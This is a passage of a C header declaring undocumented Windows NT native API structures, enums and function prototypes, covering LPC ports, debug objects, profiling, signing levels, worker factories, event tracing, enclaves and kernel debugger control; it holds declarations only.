PPORT_MESSAGE64;\n\ntypedef struct _PORT_DATA_ENTRY {\n PVOID Base;\n ULONG Size;\n} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY;\n\ntypedef struct _PORT_DATA_INFORMATION {\n ULONG CountDataEntries;\n PORT_DATA_ENTRY DataEntries[1];\n} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION;\n\n#ifndef InitializeMessageHeader\n#define InitializeMessageHeader(ph, l, t) \\\n{ \\\n (ph)->u1.s1.TotalLength = (USHORT)(l); \\\n (ph)->u1.s1.DataLength = (USHORT)(l - sizeof(PORT_MESSAGE)); \\\n (ph)->u2.s2.Type = (USHORT)(t); \\\n (ph)->u2.s2.DataInfoOffset = 0; \\\n (ph)->ClientId.UniqueProcess = NULL; \\\n (ph)->ClientId.UniqueThread = NULL; \\\n (ph)->MessageId = 0; \\\n (ph)->ClientViewSize = 0; \\\n}\n#endif\n\n#define LPC_REQUEST 1\n#define LPC_REPLY 2\n#define LPC_DATAGRAM 3\n#define LPC_LOST_REPLY 4\n#define LPC_PORT_CLOSED 5\n#define LPC_CLIENT_DIED 6\n#define LPC_EXCEPTION 7\n#define LPC_DEBUG_EVENT 8\n#define LPC_ERROR_EVENT 9\n#define LPC_CONNECTION_REQUEST 10\n#define LPC_CONTINUATION_REQUIRED 0x2000\n\n\n#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE)\n#define PORT_MAXIMUM_MESSAGE_LENGTH 256\n\ntypedef struct _LPC_CLIENT_DIED_MSG {\n PORT_MESSAGE PortMsg;\n LARGE_INTEGER CreateTime;\n} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreatePort(\n _Out_ PHANDLE PortHandle,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ ULONG MaxConnectionInfoLength,\n _In_ ULONG MaxMessageLength,\n _In_ ULONG MaxPoolUsage);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCompleteConnectPort(\n _In_ HANDLE PortHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtListenPort(\n _In_ HANDLE PortHandle,\n _Out_ PPORT_MESSAGE ConnectionRequest);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReplyPort(\n _In_ HANDLE PortHandle,\n _In_ PPORT_MESSAGE ReplyMessage);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReplyWaitReplyPort(\n _In_ HANDLE PortHandle,\n _Inout_ PPORT_MESSAGE ReplyMessage);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRequestPort(\n _In_ HANDLE PortHandle,\n _In_ PPORT_MESSAGE RequestMessage);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRequestWaitReplyPort(\n _In_ HANDLE PortHandle,\n _In_ PPORT_MESSAGE RequestMessage,\n _Out_ PPORT_MESSAGE ReplyMessage);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtClosePort(\n _In_ HANDLE PortHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReplyWaitReceivePort(\n _In_ HANDLE PortHandle,\n _Out_opt_ PVOID *PortContext,\n _In_opt_ PPORT_MESSAGE ReplyMessage,\n _Out_ PPORT_MESSAGE ReceiveMessage);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWriteRequestData(\n _In_ HANDLE PortHandle,\n _In_ PPORT_MESSAGE Message,\n _In_ ULONG DataEntryIndex,\n _In_ PVOID Buffer,\n _In_ ULONG BufferSize,\n _Out_opt_ PULONG NumberOfBytesWritten);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReadRequestData(\n _In_ HANDLE PortHandle,\n _In_ PPORT_MESSAGE Message,\n _In_ ULONG DataEntryIndex,\n _Out_ PVOID Buffer,\n _In_ ULONG BufferSize,\n _Out_opt_ PULONG NumberOfBytesRead);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtConnectPort(\n _Out_ PHANDLE PortHandle,\n _In_ PUNICODE_STRING PortName,\n _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos,\n _Inout_opt_ PPORT_VIEW ClientView,\n _Out_opt_ PREMOTE_PORT_VIEW ServerView,\n _Out_opt_ PULONG MaxMessageLength,\n _Inout_opt_\tPVOID ConnectionInformation,\n _Inout_opt_\tPULONG ConnectionInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAcceptConnectPort(\n _Out_ PHANDLE PortHandle,\n _In_opt_ PVOID PortContext,\n _In_ PPORT_MESSAGE ConnectionRequest,\n _In_ BOOLEAN AcceptConnection,\n _Inout_opt_ PPORT_VIEW ServerView,\n _Out_opt_ PREMOTE_PORT_VIEW ClientView);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSecureConnectPort(\n _Out_ PHANDLE PortHandle,\n _In_ PUNICODE_STRING PortName,\n _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos,\n _Inout_opt_ PPORT_VIEW ClientView,\n _In_opt_ PSID RequiredServerSid,\n _Inout_opt_ PREMOTE_PORT_VIEW ServerView,\n _Out_opt_ PULONG MaxMessageLength,\n _Inout_opt_ PVOID ConnectionInformation,\n _Inout_opt_ PULONG ConnectionInformationLength);\n\n/************************************************************************************\n*\n* Boot Management API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtEnumerateBootEntries(\n _Out_writes_bytes_opt_(*BufferLength) PVOID Buffer,\n _Inout_ PULONG BufferLength);\n\n/************************************************************************************\n*\n* Reserve Objects API.\n*\n************************************************************************************/\n\ntypedef enum _MEMORY_RESERVE_TYPE {\n MemoryReserveUserApc,\n MemoryReserveIoCompletion,\n MemoryReserveTypeMax\n} MEMORY_RESERVE_TYPE;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAllocateReserveObject(\n _Out_ PHANDLE MemoryReserveHandle,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ MEMORY_RESERVE_TYPE Type);\n\n/************************************************************************************\n*\n* Debug API.\n*\n************************************************************************************/\n\n//\n// Define the debug object thats used to attatch to processes that are being debugged.\n//\n#define DEBUG_OBJECT_DELETE_PENDING (0x1) // Debug object is delete pending.\n#define DEBUG_OBJECT_KILL_ON_CLOSE (0x2) // Kill all debugged processes on close\n\ntypedef struct _DEBUG_OBJECT {\n //\n // Event thats set when the EventList is populated.\n //\n KEVENT EventsPresent;\n //\n // Mutex to protect the structure\n //\n FAST_MUTEX Mutex;\n //\n // Queue of events waiting for debugger intervention\n //\n LIST_ENTRY EventList;\n //\n // Flags for the object\n //\n ULONG Flags;\n} DEBUG_OBJECT, *PDEBUG_OBJECT;\n\ntypedef enum _DEBUGOBJECTINFOCLASS {\n DebugObjectUnusedInformation,\n DebugObjectKillProcessOnExitInformation,\n MaxDebugObjectInfoClass\n} DEBUGOBJECTINFOCLASS, * PDEBUGOBJECTINFOCLASS;\n\ntypedef struct _DBGKM_EXCEPTION {\n EXCEPTION_RECORD ExceptionRecord;\n ULONG FirstChance;\n} DBGKM_EXCEPTION, * PDBGKM_EXCEPTION;\n\ntypedef struct _DBGKM_CREATE_THREAD {\n ULONG SubSystemKey;\n PVOID StartAddress;\n} DBGKM_CREATE_THREAD, * PDBGKM_CREATE_THREAD;\n\ntypedef struct _DBGKM_CREATE_PROCESS {\n ULONG SubSystemKey;\n HANDLE FileHandle;\n PVOID BaseOfImage;\n ULONG DebugInfoFileOffset;\n ULONG DebugInfoSize;\n DBGKM_CREATE_THREAD InitialThread;\n} DBGKM_CREATE_PROCESS, * PDBGKM_CREATE_PROCESS;\n\ntypedef struct _DBGKM_EXIT_THREAD {\n NTSTATUS ExitStatus;\n} DBGKM_EXIT_THREAD, * PDBGKM_EXIT_THREAD;\n\ntypedef struct _DBGKM_EXIT_PROCESS {\n NTSTATUS ExitStatus;\n} DBGKM_EXIT_PROCESS, * PDBGKM_EXIT_PROCESS;\n\ntypedef struct _DBGKM_LOAD_DLL {\n HANDLE FileHandle;\n PVOID BaseOfDll;\n ULONG DebugInfoFileOffset;\n ULONG DebugInfoSize;\n PVOID NamePointer;\n} DBGKM_LOAD_DLL, * PDBGKM_LOAD_DLL;\n\ntypedef struct _DBGKM_UNLOAD_DLL {\n PVOID BaseAddress;\n} DBGKM_UNLOAD_DLL, * PDBGKM_UNLOAD_DLL;\n\ntypedef enum _DBG_STATE {\n DbgIdle,\n DbgReplyPending,\n DbgCreateThreadStateChange,\n DbgCreateProcessStateChange,\n DbgExitThreadStateChange,\n DbgExitProcessStateChange,\n DbgExceptionStateChange,\n DbgBreakpointStateChange,\n DbgSingleStepStateChange,\n DbgLoadDllStateChange,\n DbgUnloadDllStateChange\n} DBG_STATE, * PDBG_STATE;\n\ntypedef struct _DBGUI_CREATE_THREAD {\n HANDLE HandleToThread;\n DBGKM_CREATE_THREAD NewThread;\n} DBGUI_CREATE_THREAD, * PDBGUI_CREATE_THREAD;\n\ntypedef struct _DBGUI_CREATE_PROCESS {\n HANDLE HandleToProcess;\n HANDLE HandleToThread;\n DBGKM_CREATE_PROCESS NewProcess;\n} DBGUI_CREATE_PROCESS, * PDBGUI_CREATE_PROCESS;\n\ntypedef struct _DBGUI_WAIT_STATE_CHANGE {\n DBG_STATE NewState;\n CLIENT_ID AppClientId;\n union\n {\n DBGKM_EXCEPTION Exception;\n DBGUI_CREATE_THREAD CreateThread;\n DBGUI_CREATE_PROCESS CreateProcessInfo;\n DBGKM_EXIT_THREAD ExitThread;\n DBGKM_EXIT_PROCESS ExitProcess;\n DBGKM_LOAD_DLL LoadDll;\n DBGKM_UNLOAD_DLL UnloadDll;\n } StateInfo;\n} DBGUI_WAIT_STATE_CHANGE, * PDBGUI_WAIT_STATE_CHANGE;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateDebugObject(\n _Out_ PHANDLE DebugObjectHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationDebugObject(\n _In_ HANDLE DebugObjectHandle,\n _In_ DEBUGOBJECTINFOCLASS DebugObjectInformationClass,\n _In_reads_bytes_(DebugInformationLength) PVOID DebugInformation,\n _In_ ULONG DebugInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDebugActiveProcess(\n _In_ HANDLE ProcessHandle,\n _In_ HANDLE DebugObjectHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDebugContinue(\n _In_ HANDLE DebugObjectHandle,\n _In_ PCLIENT_ID ClientId,\n _In_ NTSTATUS ContinueStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWaitForDebugEvent(\n _In_ HANDLE DebugObjectHandle,\n _In_ BOOLEAN Alertable,\n _In_opt_ PLARGE_INTEGER Timeout,\n _Out_ PDBGUI_WAIT_STATE_CHANGE WaitStateChange\n);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRemoveProcessDebug(\n _In_ HANDLE ProcessHandle,\n _In_ HANDLE DebugObjectHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryDebugFilterState(\n _In_ ULONG ComponentId,\n _In_ ULONG Level);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetDebugFilterState(\n _In_ ULONG ComponentId,\n _In_ ULONG Level,\n _In_ BOOLEAN State);\n\n\n/************************************************************************************\n*\n* Profile API.\n*\n************************************************************************************/\n\ntypedef enum _KPROFILE_SOURCE {\n ProfileTime,\n ProfileAlignmentFixup,\n ProfileTotalIssues,\n ProfilePipelineDry,\n ProfileLoadInstructions,\n ProfilePipelineFrozen,\n ProfileBranchInstructions,\n ProfileTotalNonissues,\n ProfileDcacheMisses,\n ProfileIcacheMisses,\n ProfileCacheMisses,\n ProfileBranchMispredictions,\n ProfileStoreInstructions,\n ProfileFpInstructions,\n ProfileIntegerInstructions,\n Profile2Issue,\n Profile3Issue,\n Profile4Issue,\n ProfileSpecialInstructions,\n ProfileTotalCycles,\n ProfileIcacheIssues,\n ProfileDcacheAccesses,\n ProfileMemoryBarrierCycles,\n ProfileLoadLinkedIssues,\n ProfileMaximum\n} KPROFILE_SOURCE;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateProfile(\n _Out_ PHANDLE ProfileHandle,\n _In_opt_ HANDLE Process,\n _In_ PVOID ProfileBase,\n _In_ SIZE_T ProfileSize,\n _In_ ULONG BucketSize,\n _In_reads_bytes_(BufferSize) PULONG Buffer,\n _In_ ULONG BufferSize,\n _In_ KPROFILE_SOURCE ProfileSource,\n _In_ KAFFINITY Affinity);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtStartProfile(\n _In_ HANDLE ProfileHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtStopProfile(\n _In_ HANDLE ProfileHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryIntervalProfile(\n _In_ KPROFILE_SOURCE ProfileSource,\n _Out_ PULONG Interval);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetIntervalProfile(\n _In_ ULONG Interval,\n _In_ KPROFILE_SOURCE Source);\n\n/************************************************************************************\n*\n* Signing Levels API.\n*\n************************************************************************************/\ntypedef UCHAR SE_SIGNING_LEVEL, *PSE_SIGNING_LEVEL;\n\ntypedef struct _SE_FILE_CACHE_CLAIM_INFORMATION {\n ULONG Size;\n PVOID Claim;\n} SE_FILE_CACHE_CLAIM_INFORMATION, *PSE_FILE_CACHE_CLAIM_INFORMATION;\n\ntypedef struct _SE_SET_FILE_CACHE_INFORMATION {\n ULONG Size;\n UNICODE_STRING CatalogDirectoryPath;\n SE_FILE_CACHE_CLAIM_INFORMATION OriginClaimInfo;\n} SE_SET_FILE_CACHE_INFORMATION, *PSE_SET_FILE_CACHE_INFORMATION;\n\n#ifndef SE_SIGNING_LEVEL_UNCHECKED\n#define SE_SIGNING_LEVEL_UNCHECKED 0x00000000\n#endif\n\n#ifndef SE_SIGNING_LEVEL_UNSIGNED\n#define SE_SIGNING_LEVEL_UNSIGNED 0x00000001\n#endif\n\n#ifndef SE_SIGNING_LEVEL_ENTERPRISE\n#define SE_SIGNING_LEVEL_ENTERPRISE 0x00000002\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_1\n#define SE_SIGNING_LEVEL_CUSTOM_1 0x00000003\n#endif\n\n#ifndef SE_SIGNING_LEVEL_DEVELOPER\n#define SE_SIGNING_LEVEL_DEVELOPER SE_SIGNING_LEVEL_CUSTOM_1\n#endif\n\n#ifndef SE_SIGNING_LEVEL_AUTHENTICODE\n#define SE_SIGNING_LEVEL_AUTHENTICODE 0x00000004\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_2\n#define SE_SIGNING_LEVEL_CUSTOM_2 0x00000005\n#endif\n\n#ifndef SE_SIGNING_LEVEL_STORE\n#define SE_SIGNING_LEVEL_STORE 0x00000006\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_3\n#define SE_SIGNING_LEVEL_CUSTOM_3 0x00000007\n#endif\n\n#ifndef SE_SIGNING_LEVEL_ANTIMALWARE\n#define SE_SIGNING_LEVEL_ANTIMALWARE SE_SIGNING_LEVEL_CUSTOM_3\n#endif\n\n#ifndef SE_SIGNING_LEVEL_MICROSOFT\n#define SE_SIGNING_LEVEL_MICROSOFT 0x00000008\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_4\n#define SE_SIGNING_LEVEL_CUSTOM_4 0x00000009\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_5\n#define SE_SIGNING_LEVEL_CUSTOM_5 0x0000000A\n#endif\n\n#ifndef SE_SIGNING_LEVEL_DYNAMIC_CODEGEN\n#define SE_SIGNING_LEVEL_DYNAMIC_CODEGEN 0x0000000B\n#endif\n\n#ifndef SE_SIGNING_LEVEL_WINDOWS\n#define SE_SIGNING_LEVEL_WINDOWS 0x0000000C\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_7\n#define SE_SIGNING_LEVEL_CUSTOM_7 0x0000000D\n#endif\n\n#ifndef SE_SIGNING_LEVEL_WINDOWS_TCB\n#define SE_SIGNING_LEVEL_WINDOWS_TCB 0x0000000E\n#endif\n\n#ifndef SE_SIGNING_LEVEL_CUSTOM_6\n#define SE_SIGNING_LEVEL_CUSTOM_6 0x0000000F\n#endif\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetCachedSigningLevel(\n _In_ ULONG Flags,\n _In_ SE_SIGNING_LEVEL InputSigningLevel,\n _In_reads_(SourceFileCount) PHANDLE SourceFiles,\n _In_ ULONG SourceFileCount,\n _In_opt_ HANDLE TargetFile);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetCachedSigningLevel2(\n _In_ ULONG Flags,\n _In_ SE_SIGNING_LEVEL InputSigningLevel,\n _In_reads_(SourceFileCount) PHANDLE SourceFiles,\n _In_ ULONG SourceFileCount,\n _In_opt_ HANDLE TargetFile,\n _In_opt_ SE_SET_FILE_CACHE_INFORMATION* CacheInformation);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtGetCachedSigningLevel(\n _In_ HANDLE File,\n _Out_ PULONG Flags,\n _Out_ PSE_SIGNING_LEVEL SigningLevel,\n _Out_writes_bytes_to_opt_(*ThumbprintSize, *ThumbprintSize) PUCHAR Thumbprint,\n _Inout_opt_ PULONG ThumbprintSize,\n _Out_opt_ PULONG ThumbprintAlgorithm);\n\n//REDSTONE 2 and above\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCompareSigningLevels(\n _In_ SE_SIGNING_LEVEL FirstSigningLevel,\n _In_ SE_SIGNING_LEVEL SecondSigningLevel);\n\n/************************************************************************************\n*\n* Worker Factory API.\n*\n************************************************************************************/\n\ntypedef enum _WORKERFACTORYINFOCLASS {\n WorkerFactoryTimeout,\n WorkerFactoryRetryTimeout,\n WorkerFactoryIdleTimeout,\n WorkerFactoryBindingCount,\n WorkerFactoryThreadMinimum,\n WorkerFactoryThreadMaximum,\n WorkerFactoryPaused,\n WorkerFactoryBasicInformation,\n WorkerFactoryAdjustThreadGoal,\n WorkerFactoryCallbackType,\n WorkerFactoryStackInformation,\n WorkerFactoryThreadBasePriority,\n WorkerFactoryTimeoutWaiters,\n WorkerFactoryFlags,\n WorkerFactoryThreadSoftMaximum,\n MaxWorkerFactoryInfoClass\n} WORKERFACTORYINFOCLASS, *PWORKERFACTORYINFOCLASS;\n\ntypedef struct _WORKER_FACTORY_BASIC_INFORMATION {\n LARGE_INTEGER Timeout;\n LARGE_INTEGER RetryTimeout;\n LARGE_INTEGER IdleTimeout;\n BOOLEAN Paused;\n BOOLEAN TimerSet;\n BOOLEAN QueuedToExWorker;\n BOOLEAN MayCreate;\n BOOLEAN CreateInProgress;\n BOOLEAN InsertedIntoQueue;\n BOOLEAN Shutdown;\n ULONG BindingCount;\n ULONG ThreadMinimum;\n ULONG ThreadMaximum;\n ULONG PendingWorkerCount;\n ULONG WaitingWorkerCount;\n ULONG TotalWorkerCount;\n ULONG ReleaseCount;\n LONGLONG InfiniteWaitGoal;\n PVOID StartRoutine;\n PVOID StartParameter;\n HANDLE ProcessId;\n SIZE_T StackReserve;\n SIZE_T StackCommit;\n NTSTATUS LastThreadCreationStatus;\n} WORKER_FACTORY_BASIC_INFORMATION, *PWORKER_FACTORY_BASIC_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateWorkerFactory(\n _Out_ PHANDLE WorkerFactoryHandleReturn,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ HANDLE CompletionPortHandle,\n _In_ HANDLE WorkerProcessHandle,\n _In_ PVOID StartRoutine,\n _In_opt_ PVOID StartParameter,\n _In_opt_ ULONG MaxThreadCount,\n _In_opt_ SIZE_T StackReserve,\n _In_opt_ SIZE_T StackCommit);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationWorkerFactory(\n _In_ HANDLE WorkerFactoryHandle,\n _In_ WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,\n _Out_writes_bytes_(WorkerFactoryInformationLength) PVOID WorkerFactoryInformation,\n _In_ ULONG WorkerFactoryInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtShutdownWorkerFactory(\n _In_ HANDLE WorkerFactoryHandle,\n _Inout_ volatile LONG *PendingWorkerCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReleaseWorkerFactoryWorker(\n _In_ HANDLE WorkerFactoryHandle);\n\n/************************************************************************************\n*\n* Event Tracing API.\n*\n************************************************************************************/\n\ntypedef enum _TRACE_CONTROL_INFORMATION_CLASS {\n TraceControlStartLogger = 1,\n TraceControlStopLogger = 2,\n TraceControlQueryLogger = 3,\n TraceControlUpdateLogger = 4,\n TraceControlFlushLogger = 5,\n TraceControlIncrementLoggerFile = 6,\n TraceControlInvalidClass1 = 7,\n TraceControlInvalidCalss2 = 8,\n TraceControlInvalidClass3 = 9,\n TraceControlInvalidClass4 = 10,\n TraceControlRealtimeConnect = 11,\n TraceControlWdiDispatchControl = 13,\n TraceControlRealtimeDisconnectConsumerByHandle = 14,\n TraceControlReceiveNotification = 16,\n TraceControlEnableGuid = 17,\n TraceControlSendReplyDataBlock = 18,\n TraceControlReceiveReplyDataBlock = 19,\n TraceControlWdiUpdateSem = 20,\n TraceControlGetTraceGuidList = 21,\n TraceControlGetTraceGuidInfo = 22,\n TraceControlEnumerateTraceGuids = 23,\n TraceControlInvalidClass5 = 24,\n TraceControlQueryReferenceTime = 25,\n TraceControlTrackProviderBinary = 26,\n TraceControlAddNotificationEvent = 27,\n TraceControlUpdateDisallowList = 28,\n TraceControlInvalidClass6 = 29,\n TraceControlInvalidClass7 = 30,\n TraceControlUseDescriptorTypeUm = 31,\n TraceControlGetTraceGroupList = 32,\n TraceControlGetTraceGroupInfo = 33,\n TraceControlTraceSetDisallowList = 34,\n TraceControlSetCompressionSettings = 35,\n TraceControlGetCompressionSettings = 36,\n TraceControlUpdatePeriodicCaptureState = 37,\n TraceControlGetPrivateSessionTraceHandle = 38,\n TraceControlRegisterPrivateSession = 39,\n TraceControlQuerySessionDemuxObject = 40,\n TraceControlSetProviderBinaryTracking = 41,\n TraceControlMaxLoggers = 42,\n TraceControlMaxPmcCounter = 43\n} TRACE_CONTROL_INFORMATION_CLASS;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTraceEvent(\n _In_ HANDLE TraceHandle,\n _In_ ULONG Flags,\n _In_ ULONG FieldSize,\n _In_ PVOID Fields);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTraceControl(\n _In_ TRACE_CONTROL_INFORMATION_CLASS TraceInformationClass,\n _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,\n _In_ ULONG InputBufferLength,\n _Out_writes_bytes_opt_(TraceInformationLength) PVOID TraceInformation,\n _In_ ULONG TraceInformationLength,\n _Out_ PULONG ReturnLength);\n\n/************************************************************************************\n*\n* Enclave API.\n*\n************************************************************************************/\n\n#ifndef _WIN32_WINNT_WIN10\n#define _WIN32_WINNT_WIN10 0x0A00\n#endif\n#if (_WIN32_WINNT < _WIN32_WINNT_WIN10)\ntypedef LPVOID(WINAPI* PENCLAVE_ROUTINE) (LPVOID lpThreadParameter);\ntypedef PENCLAVE_ROUTINE LPENCLAVE_ROUTINE;\n#endif\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateEnclave(\n _In_ HANDLE ProcessHandle,\n _Inout_ PVOID* BaseAddress,\n _In_ ULONG_PTR ZeroBits,\n _In_ SIZE_T Size,\n _In_ SIZE_T InitialCommitment,\n _In_ ULONG EnclaveType,\n _In_reads_bytes_(EnclaveInformationLength) PVOID EnclaveInformation,\n _In_ ULONG EnclaveInformationLength,\n _Out_opt_ PULONG EnclaveError);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadEnclaveData(\n _In_ HANDLE ProcessHandle,\n _In_ PVOID BaseAddress,\n _In_reads_bytes_(BufferSize) PVOID Buffer,\n _In_ SIZE_T BufferSize,\n _In_ ULONG Protect,\n _In_reads_bytes_(PageInformationLength) PVOID PageInformation,\n _In_ ULONG PageInformationLength,\n _Out_opt_ PSIZE_T NumberOfBytesWritten,\n _Out_opt_ PULONG EnclaveError);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtInitializeEnclave(\n _In_ HANDLE ProcessHandle,\n _In_ PVOID BaseAddress,\n _In_reads_bytes_(EnclaveInformationLength) PVOID EnclaveInformation,\n _In_ ULONG EnclaveInformationLength,\n _Out_opt_ PULONG EnclaveError);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTerminateEnclave(\n _In_ PVOID BaseAddress,\n _In_ BOOLEAN WaitForThread);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCallEnclave(\n _In_ PENCLAVE_ROUTINE Routine,\n _In_ PVOID Parameter,\n _In_ BOOLEAN WaitForThread,\n _Out_opt_ PVOID* ReturnValue);\n\n\n/************************************************************************************\n*\n* LUID/UUID API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetUuidSeed(\n _In_ PCHAR Seed);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAllocateUuids(\n _Out_ PULARGE_INTEGER Time,\n _Out_ PULONG Range,\n _Out_ PULONG Sequence,\n _Out_ PCHAR Seed);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAllocateLocallyUniqueId(\n _Out_ PLUID Luid);\n\n\n/************************************************************************************\n*\n* Kernel Debugger API.\n*\n************************************************************************************/\n\ntypedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION {\n BOOLEAN KernelDebuggerEnabled;\n BOOLEAN KernelDebuggerNotPresent;\n} SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION;\n\ntypedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX {\n BOOLEAN DebuggerAllowed;\n BOOLEAN DebuggerEnabled;\n BOOLEAN DebuggerPresent;\n} SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION_EX;\n\ntypedef enum _SYSDBG_COMMAND {\n SysDbgQueryModuleInformation,\n SysDbgQueryTraceInformation,\n SysDbgSetTracepoint,\n SysDbgSetSpecialCall,\n SysDbgClearSpecialCalls,\n SysDbgQuerySpecialCalls,\n SysDbgBreakPoint,\n SysDbgQueryVersion,\n SysDbgReadVirtual,\n SysDbgWriteVirtual,\n SysDbgReadPhysical,\n SysDbgWritePhysical,\n SysDbgReadControlSpace,\n SysDbgWriteControlSpace,\n SysDbgReadIoSpace,\n SysDbgWriteIoSpace,\n SysDbgReadMsr,\n SysDbgWriteMsr,\n SysDbgReadBusData,\n SysDbgWriteBusData,\n SysDbgCheckLowMemory,\n SysDbgEnableKernelDebugger,\n SysDbgDisableKernelDebugger,\n SysDbgGetAutoKdEnable,\n SysDbgSetAutoKdEnable,\n SysDbgGetPrintBufferSize,\n SysDbgSetPrintBufferSize,\n SysDbgGetKdUmExceptionEnable,\n SysDbgSetKdUmExceptionEnable,\n SysDbgGetTriageDump,\n SysDbgGetKdBlockEnable,\n SysDbgSetKdBlockEnable,\n SysDbgRegisterForUmBreakInfo,\n SysDbgGetUmBreakPid,\n SysDbgClearUmBreakPid,\n SysDbgGetUmAttachPid,\n SysDbgClearUmAttachPid,\n SysDbgGetLiveKernelDump,\n SysDbgKdPullRemoteFile,\n SysDbgMaxInfoClass\n} SYSDBG_COMMAND, *PSYSDBG_COMMAND;\n\ntypedef struct _SYSDBG_VIRTUAL {\n PVOID Address;\n PVOID Buffer;\n ULONG Request;\n} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSystemDebugControl(\n _In_ SYSDBG_COMMAND Command,\n _Inout_updates_bytes_opt_(InputBufferLength) PVOID InputBuffer,\n _In_ ULONG InputBufferLength,\n _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,\n _In_ ULONG OutputBufferLength,\n _Out_opt_ PULONG ReturnLength);\n\n/************************************************************************************\n*\n* HardError API.\n*\n************************************************************************************/\n\n#ifndef HARDERROR_OVERRIDE_ERRORMODE\n#define HARDERROR_OVERRIDE_ERRORMODE 0x10000000\n#endif\n\ntypedef enum _HARDERROR_RESPONSE_OPTION {\n OptionAbortRetryIgnore,\n OptionOk,\n OptionOkCancel,\n OptionRetryCancel,\n OptionYesNo,\n OptionYesNoCancel,\n OptionShutdownSystem,\n OptionOkNoWait,\n OptionCancelTryContinue\n} HARDERROR_RESPONSE_OPTION;\n\ntypedef enum _HARDERROR_RESPONSE {\n ResponseReturnToCaller,\n ResponseNotHandled,\n ResponseAbort,\n ResponseCancel,\n ResponseIgnore,\n ResponseNo,\n ResponseOk,\n ResponseRetry,\n ResponseYes,\n ResponseTryAgain,\n ResponseContinue\n} HARDERROR_RESPONSE;\n\nNTSYSCALLAPI\nNTSTATUS\nNTAPI\nNtRaiseHardError(\n _In_ NTSTATUS ErrorStatus,\n _In_ ULONG NumberOfParameters,\n _In_ ULONG UnicodeStringParameterMask,\n _In_reads_(NumberOfParameters) PULONG_PTR Parameters,\n _In_ ULONG ValidResponseOptions,\n _Out_ 